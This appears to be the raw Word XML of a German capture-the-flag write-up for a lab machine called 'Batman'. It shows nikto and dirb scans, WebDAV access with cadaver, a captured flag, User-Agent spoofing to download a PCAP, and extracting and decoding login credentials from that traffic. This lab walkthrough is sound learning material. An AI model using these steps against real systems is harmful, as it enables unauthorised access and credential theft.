        <w:pStyle w:val="Verzeichnis2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Level 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438910 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="142950F8" w14:textId="36E0A274" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.2</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Level2</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438911 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1013F896" w14:textId="3ED1E561" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.3</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Level3</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438912 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="693458B3" w14:textId="2A3921EE" w:rsidR="00837897" w:rsidRDefault="00837897">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438913 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A">
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA244A" w14:textId="2B9A807A" w:rsidR="00284FA6" w:rsidRDefault="00284FA6" w:rsidP="00681036">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Toc438850"/>
      <w:r w:rsidR="00DA3009">
        <w:t>Batman</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="30E80CDE" w14:textId="77777777" w:rsidR="00DA3009" w:rsidRDefault="00DA3009" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc438851"/>
      <w:r>
        <w:t>Level 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="1EF32E95" w14:textId="3E70606E" w:rsidR="00DA3009" w:rsidRDefault="00DA3009" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc438852"/>
      <w:r>
        <w:t>Nikto Scan:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7830282A" w14:textId="778C84D6" w:rsidR="00670401" w:rsidRPr="00670401" w:rsidRDefault="00670401" w:rsidP="00670401">
      <w:r>
        <w:t xml:space="preserve">Der Befehl zum </w:t>
      </w:r>
      <w:r w:rsidR="008733BA">
        <w:t>Scannen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mit </w:t>
      </w:r>
      <w:r w:rsidR="008733BA">
        <w:t>nikto ist hier aufgeführt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F4499E" w14:textId="77777777" w:rsidR="00DA3009" w:rsidRDefault="00DA3009" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>nikto -host 10.85.229.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37862ECC" w14:textId="77777777" w:rsidR="00DA3009" w:rsidRDefault="00DA3009" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FD91E7" w14:textId="7F297405" w:rsidR="00DA3009" w:rsidRDefault="00BA13A8" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251653632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7454E105" wp14:editId="639E8A8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>11537</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2121409</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5359155" cy="199177"/>
                <wp:effectExtent l="0" t="0" r="13335" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="14" name="Rechteck 14"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5359155" cy="199177"/>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1A959" id="Rechteck 14" o:spid="_x0000_s1026" style="position:absolute;margin-left:.9pt;margin-top:167.05pt;width:422pt;height:15.7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" filled="f" strokecolor="#9bbb59 [3206]">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DA3009">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30E1CE12" wp14:editId="2C4C15D1">
            <wp:extent cx="5400675" cy="3009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3009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A59F0C" w14:textId="77777777" w:rsidR="00DA3009" w:rsidRDefault="00DA3009" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE1408B" w14:textId="3F01FDA1" w:rsidR="00DA3009" w:rsidRDefault="00DA3009" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc438853"/>
      <w:r>
        <w:t>Dirb Scan:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4A6BCFD8" w14:textId="40C44B0A" w:rsidR="006977F8" w:rsidRPr="006977F8" w:rsidRDefault="006977F8" w:rsidP="006977F8">
      <w:r>
        <w:t>Nahezu das Selbe ist es mit dirb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD48CA4" w14:textId="64EA455A" w:rsidR="00DA3009" w:rsidRDefault="00DA3009" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dirb </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3009">
        <w:t>http://10.85.229.145</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A738775" w14:textId="45AA5A00" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334B96DB" w14:textId="68E153AE" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78180D53" wp14:editId="21CD80E1">
            <wp:extent cx="5400675" cy="276987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2769870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27543B3D" w14:textId="7ED15FE7" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41591B20" w14:textId="153C03EE" w:rsidR="002B4D04" w:rsidRPr="008E799A" w:rsidRDefault="00984651" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Die</w:t>
      </w:r>
      <w:r w:rsidR="00D620D9" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> test.php </w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Datei </w:t>
      </w:r>
      <w:r w:rsidR="00CE0473" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">zeigt Informationen über die PHP Einstellungen </w:t>
      </w:r>
      <w:r w:rsidR="00074A52" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">auf dem Server und die Version von PHP. Normalerweise warden diese Informationen in der info.php Datei dargestellt, wenn </w:t>
      </w:r>
      <w:r w:rsidR="00D95C89" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>diese sichtbar ist.</w:t>
      </w:r>
      <w:r w:rsidR="00D620D9" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E91353C" w14:textId="72D819E8" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00BA13A8">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc438854"/>
      <w:r>
        <w:t>Webdav:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6766CB9F" w14:textId="21FE51E4" w:rsidR="00CF1218" w:rsidRPr="00CF1218" w:rsidRDefault="00CF1218" w:rsidP="00CF1218">
      <w:r>
        <w:t xml:space="preserve">Der </w:t>
      </w:r>
      <w:r w:rsidR="006C6ED6">
        <w:t>untenstehende</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Befehl kann genutzt werden um </w:t>
      </w:r>
      <w:r w:rsidR="006C6ED6">
        <w:t>auf das Webdav Verzeichnis zuzugreifen. Danach kann ganz no</w:t>
      </w:r>
      <w:r w:rsidR="002E2605">
        <w:t xml:space="preserve">rmal wie in der Kommandozeile der </w:t>
      </w:r>
      <w:r w:rsidR="00201FFF">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="002E2605">
        <w:t xml:space="preserve">nhalt von Verzeichnissen und </w:t>
      </w:r>
      <w:r w:rsidR="00201FFF">
        <w:t xml:space="preserve">Dateien ausgegeben werden. </w:t>
      </w:r>
      <w:r w:rsidR="00AC710F">
        <w:t>Mithilfe von cat lässt sich die untenstehende Flag auslesen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D81C5" w14:textId="35F1635B" w:rsidR="00BA13A8" w:rsidRPr="008E799A" w:rsidRDefault="00BA13A8" w:rsidP="00BA13A8">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">cadaver </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="008E799A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="de-DE"/>
          </w:rPr>
          <w:t>http://10.85.229.145/webdav/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="385875CD" w14:textId="5A41734B" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00BA13A8">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50ED0EAC" wp14:editId="52F3E408">
            <wp:extent cx="5400675" cy="1465580"/>
            <wp:effectExtent l="0" t="0" r="9525"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465580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0E9ED" w14:textId="64A6FDAF" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00BA13A8">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF92CE7" w14:textId="6E949896" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00BA13A8">
      <w:r>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13A8">
        <w:t>b4tmans_w3bdav_{5aad739dba48481a691f5f78c22526183fde5fa6eb83d16f961d6b90}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636BC50B" w14:textId="7FF451DA" w:rsidR="00BA13A8" w:rsidRDefault="00BA13A8" w:rsidP="00BA13A8">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc438855"/>
      <w:r>
        <w:t>Waynemanor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5AF515A0" w14:textId="35D894A2" w:rsidR="0083525C" w:rsidRPr="0083525C" w:rsidRDefault="0083525C" w:rsidP="0083525C">
      <w:r>
        <w:t xml:space="preserve">Als nächstes soll </w:t>
      </w:r>
      <w:r w:rsidR="000053FC">
        <w:t>ein PCAP File heruntergeladen werden mit Hilfe dessen man sich in die Waynemanor einloggen kann. Um den Download durchführen zu könne reicht es nicht den Link im Browser aufzurufen</w:t>
      </w:r>
      <w:r w:rsidR="003A0072">
        <w:t xml:space="preserve">. Man muss zum Beispiel mit Hilfe von Burp den User-Agent Header abändern auf „Bat </w:t>
      </w:r>
      <w:r w:rsidR="001C1AEB">
        <w:t>browser</w:t>
      </w:r>
      <w:r w:rsidR="003A0072">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001C1AEB">
        <w:t>. Nun kann das Pcap File heruntergeladen werden</w:t>
      </w:r>
      <w:r w:rsidR="00CE63EF">
        <w:t xml:space="preserve">. Hier bietet sich curl an, da man in Burp </w:t>
      </w:r>
      <w:r w:rsidR="008212EF">
        <w:t>zwar die Response und damit den Download sieht, ein Speichern der Datei aber schwierig ist</w:t>
      </w:r>
      <w:r w:rsidR="00112136">
        <w:t>. Es ist zu beachten, dass auch in Curl der User-Agent gesetzt werden muss.</w:t>
      </w:r>
      <w:r w:rsidR="008212EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A0072">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03843F18" w14:textId="2CAA1CEC" w:rsidR="00F45AB5" w:rsidRPr="00F45AB5" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152450B2" wp14:editId="04A5BDBA">
            <wp:extent cx="5400675" cy="93472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934720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC56507" w14:textId="1779589C" w:rsidR="00BA13A8" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25491451" w14:textId="39AC0147" w:rsidR="00F45AB5" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528E78D7" wp14:editId="1DAD015D">
            <wp:extent cx="3856776" cy="1000812"/>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6449" cy="1018892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9CD5F" w14:textId="3C7A8EA9" w:rsidR="00F45AB5" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FD5948" wp14:editId="36371170">
            <wp:extent cx="4399984" cy="1072448"/>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3076" cy="1092701"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFB359" w14:textId="282A5B79" w:rsidR="00F45AB5" w:rsidRPr="00BA13A8" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D284C3" w14:textId="49052FA0" w:rsidR="0082138B" w:rsidRDefault="00F45AB5" w:rsidP="00DA3009">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6700ED7B" wp14:editId="29A37827">
            <wp:extent cx="2817212" cy="2100404"/>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234" cy="2116077"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0082138B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B9061" w14:textId="7B5B05DA" w:rsidR="00F45AB5" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC7859" w14:textId="70E1793A" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="007D3FD1">
      <w:r>
        <w:t>Download file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B80C8" w14:textId="25172D61" w:rsidR="00F45AB5" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7272CFCE" wp14:editId="1AE998CD">
            <wp:extent cx="5400675" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="952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434340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42935668" w14:textId="3814EA9C" w:rsidR="00B1481B" w:rsidRDefault="00B1481B" w:rsidP="007D3FD1">
      <w:r>
        <w:t xml:space="preserve">Nachdem man die PCAP Datei gespeichert und in Wireshark geöffnet </w:t>
      </w:r>
      <w:r w:rsidR="00860AD7">
        <w:t xml:space="preserve">hat, kann man </w:t>
      </w:r>
      <w:r w:rsidR="00523FAD">
        <w:t xml:space="preserve">sich die Requests </w:t>
      </w:r>
      <w:r w:rsidR="002C33EB">
        <w:t>anschauen und daraus die Verwendeten Credentials ablesen. Dabei sollte man</w:t>
      </w:r>
      <w:r w:rsidR="00802009">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002C33EB">
        <w:t xml:space="preserve"> anders als ich</w:t>
      </w:r>
      <w:r w:rsidR="00802009">
        <w:t>, die richtigen Requests, d.h. die Requests mit erfolgreichem Login verwenden</w:t>
      </w:r>
      <w:r w:rsidR="00F7277A">
        <w:t>, damit man dich danach mit den richtigen Credentials auch bei Waynemanor einloggen kann.</w:t>
      </w:r>
      <w:r w:rsidR="00B37C9B">
        <w:t xml:space="preserve"> Es ist außerdem noch zu beachten dass Username und Password Encoded</w:t>
      </w:r>
      <w:r w:rsidR="00945060">
        <w:t xml:space="preserve"> im PCAP File stecken und daher noch einmal, zum Beispiel mit Burp, decoded werden müssen</w:t>
      </w:r>
      <w:r w:rsidR="00896D6A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6DBF5" w14:textId="77777777" w:rsidR="00B1481B" w:rsidRDefault="00B1481B" w:rsidP="007D3FD1"/>
    <w:p w14:paraId="0534B02B" w14:textId="21389488" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="007D3FD1">
      <w:r>
        <w:t>Take Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FE47D" w14:textId="56FE1863" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFA6EFF" wp14:editId="62248715">
            <wp:extent cx="5400675" cy="40068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400685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016919C" w14:textId="4452958A" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="007D3FD1">
      <w:r>
        <w:t>Scan it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB49B16" w14:textId="1D7F6C26" w:rsidR="00F45AB5" w:rsidRDefault="00F45AB5" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE3250D" wp14:editId="6D7B4F73">
            <wp:extent cx="5400675" cy="715645"/>
